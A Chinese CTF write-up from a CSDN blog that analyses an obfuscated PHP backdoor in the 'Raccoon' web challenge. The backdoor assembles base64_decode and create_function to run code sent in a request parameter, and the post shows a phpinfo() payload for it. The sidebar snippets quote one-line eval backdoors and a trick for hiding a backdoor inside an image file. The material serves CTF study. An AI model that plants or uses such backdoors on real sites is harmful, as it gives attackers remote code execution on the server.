Raccoon——(Web)PHP 后门分析writeup

最新推荐文章于 2022-11-17 11:44:41 发布
最新推荐文章于 2022-11-17 11:44:41 发布
阅读量286 收藏
点赞数
分类专栏: CTF 文章标签: CTF Raccoon Web php后门
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39480875/article/details/90415425
版权

题目
网页源代码如下:(我已经备注了很详细的注释)

<?php 
	$z0=$_REQUEST['sort'];
	$q1='';
	$c2="wt8m4;6eb39fxl*s5/.yj7(pod_h1kgzu0cqr)aniv2";
	$y3=array(8,38,15,7,6,4,26,25,7,34,24,25,7);
	foreach($y3 as $h4){$q1.=$c2[$h4];}   //foreach循环    q1=base64_decode
	$v5=strrev("noi"."tcnuf"."_eta"."erc");  //strrev反转字符串  create_function('参数','函数体代码')函数主要用来创建匿名函数,
	$j6=$v5("",$q1($z0));    // j6 = create_function("",base64_decode(sort))
	$j6();   //空函数,就是在执行匿名函数的  函数体代码,要想执行phpinfo函数,于是要将    phpinfo();   进行 base64加密后 传给sort参数
	              //  sort=cGhwaW5mbygpOw==
//foreach (array_expression as $value)
//第一种:遍历给定的 数组语句 array_expression 数组。
//每次循环中,当前单元的值被赋给 $value 并且数组内部的指针向前移一步(因此下一次循环中将会得到下一个单元)。
//foreach (array_expression as $key => $value)
//第二种:同上,同时当前单元的键名也会在每次循环中被赋给变量 $key。	
	
	
	
?>
嗯哼哈嘿
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP调用erc20,调 用erc20
weixin_31934101的博客
03-21 482
...杠杆的ETH仓位将会上涨30%,但ETHBULL则增长更高。第1天,ETHBULL增长15%,之后调仓买入更多ETH;第2天则按其更高的新价格增长14.3%。此时3倍看涨仓位仅按原200美元ETH的价格进一步增加15%。因此在这两天期间,3倍杠杆的仓位增长15%+15%=30%,但ETHBULL是增长15%,另在新价格上增长14.3%,实际上增幅是31.4%。这种...知识:币看BITKAN...
第六届“蓝帽杯”全国大学生网络安全技能大赛-初赛Writeup
个人博客:https://www.mrzry.top
07-09 3760
第六届“蓝帽杯”全国大学生网络安全技能大赛-初赛Writeup
蓝帽杯2022年半决赛 writeup(附取证题目+解压密码+附件)
mumuzi的博客
08-05 8619
蓝帽杯半决赛火炬木wp
wha1e的博客
08-07 384
蓝帽杯半决赛火炬木wp
php上传后门,PHP图片后门藏匿攻略
weixin_42298973的博客
03-10 760
我们平时藏匿图片后门是什么流程呢?我们来看一下0x01 初级的藏匿方法:1、建立一个eval.php文件,上面加入我们的后门:Default12、找一张图片1.jpg,最好是从目标网站上下载下来的图片。3、合并图片和php后门:DefaultCopy /b C:\xampp\htdocs\images\1.jpg + C:\xampp\htdocs\images\eval.php C:\xampp...
raccoon_dataset.zip
08-20
"dataset" 和 "raccoon" 的标签揭示了其核心内容——一个包含浣熊图像的数据集,用于训练和测试算法对浣熊的识别能力。 浣熊数据集是计算机视觉领域中常见的实例,它由大量的浣熊图片组成,可能包括不同姿态、光照...
raccoon_dataset-master.rar
06-03
浣熊数据集(raccoon_dataset-master)是一个专门为 TensorFlow 物体识别训练设计的资源,包含 xml_to_csv.py 和 generator_tfrecord.py 两个关键脚本。这个数据集可以帮助开发者训练模型来识别浣熊这一特定对象,是...
raccoon_fox_tutorial.pdf
04-22
使用Raccoon进行autodock Vina的虚拟筛选说明书。其中,raccoon用于虚拟筛选,Fox用于筛选后的数据分析
raccoon
03-17
"raccoon"项目似乎是一个与HTML相关的开发项目,但提供的信息非常有限。... ...它的主要功能是定义网页内容的结构和样式,比如文本、图像、链接等...具体的项目细节需要查看压缩包中的"raccoon-main"文件才能进一步分析
raccoon4:APK下载的Google Play
02-04
Raccoon是APK下载器,用于从Google Play提取应用程序。 跨平台(Linux,Windows,Mac OS) 避免了将您的Android设备与Google帐户相关联而引起的隐私问题 在多个设备上轻松安装应用程序,而无需多次下载。 建造 ...
Web安全--文件上传漏洞--通用漏洞--PHP
最新发布
weixin_68243135的博客
11-17 740
Web安全--文件上传--绕过--php
第四届“蓝帽杯”全国大学生网络安全 技能大赛 Writeup
algae
08-08 5512
第四届“蓝帽杯”全国大学生网络安全 技能大赛 WriteupMisc签到sudo熟悉的解密Web文件包含绕过easiestSQLiSoitgoesInclusionCryptozuc Misc 签到 观色 010editor查看,发现文件头是GIF89a,是gif文件 Stegsolve 调色道,出现前半flag ps打开,分离两个图层 Stegsolve分析,得到后半flag,即可得到完整flag sudo 喜欢玩数独吗,一起来玩吧。 nc 47.93.204.245 12000 1-9数字玩99
一个PHP混淆后门分析
weixin_30597269的博客
09-30 271
洒家的朋友的公司的某个站发现最近被上传了一个后门程序。为了取证我们抓取了HTTP请求流量,看到了一堆莫名其妙看似经过混淆的请求,响应也是看似base64的乱码。洒家用了2个小时静态分析了一遍,并写了利用脚本。后门程序看似是乱码,实际上经过了混淆,通过eval()可以执行任意PHP命令。由于混淆得很乱,做起来实在把洒家恶心了一番。 后门源代码: <?php /** * ...
2021第五届蓝帽杯初赛部分题目wp
qq_43678263的博客
04-29 5950
文章目录前言WEBBall_siginPWNslientMISC冬奥会_is_coming 前言 本次蓝帽杯初赛做出了三道解出人数最多的题,勉强混个线下。但不得不吐槽一下这届题目。冬奥会这题杂项套了100层娃,头都绕晕了;PWN题的slient是2020年蓝帽杯决赛原题。其他题没做出来,没有发言权。 WEB Ball_sigin 签到题,用手机打开,填补3次左上角空缺的单词,完成滑雪游戏即得到flag flag{3b2e48de-e328-4267-a8d6-8d17fb3c8889} PWN sl
第二届“金盾信安杯“网络安全大赛WEB Writeup
Firebasky的博客
12-21 1150
博主没有参加这个比赛,但是是小伙伴分享的题,做了一下,质量还不错,最后是通过复现的。写了一下自己的感触。 链接:https://pan.baidu.com/s/1psOX409XV-RwWmPbgXM-pg 提取码:xp8y 复制这段内容后打开百度网盘手机App,操作更方便哦 ...
php上传后门,Dedecms疑似被植入后门 上传PHP后门可控制整个网站
weixin_28871989的博客
03-10 316
Admin5站长网2月21日消息,昨日乌云漏洞报告平台()发布漏洞报告,称国内知名开源CMS软件Dedecms被入侵种植后门,影响使用dedecms的网站和企业,后门代码在/include/shopcar.class.php中,希望直接使用dedecms又未作审计的网站速度处理。360网站安全检测官方微博称经过工程师的测试,可以上传PHP后门来控制整个网站。目前已经将该后门加入到webscan网站...
那些强悍的PHP一句话后门
大方子
08-06 9438
以一个学习的心态来对待PHP后门程序,很多PHP后门代码让我们看到程序员们是多么的用心良苦。 强悍的PHP一句话后门 这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。 利用404页面隐藏PHP小马   PHP   1 2 3 4 ...
php后门隐藏技巧
weixin_34150503的博客
08-25 358
一句话 and 大马phpspy 菜刀一句话<?php@eval($_POST['cmd']);?>反射后门<?php$func = new ReflectionFunction($_GET[m]);echo $func->invokeArgs(array($_GET[c]));?>调用如x.php?m=system&c=...
Nokia Mobile Web Server: 产品线介绍与技术概览
2. **Raccoon与Mobile Web Server的区别**:Raccoon作为开发版本,不断进行更新和优化,而Mobile Web Server是稳定的产品形态,具备完善的用户界面和管理功能。 3. **内容创建与服务器管理**:详细阐述了如何在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值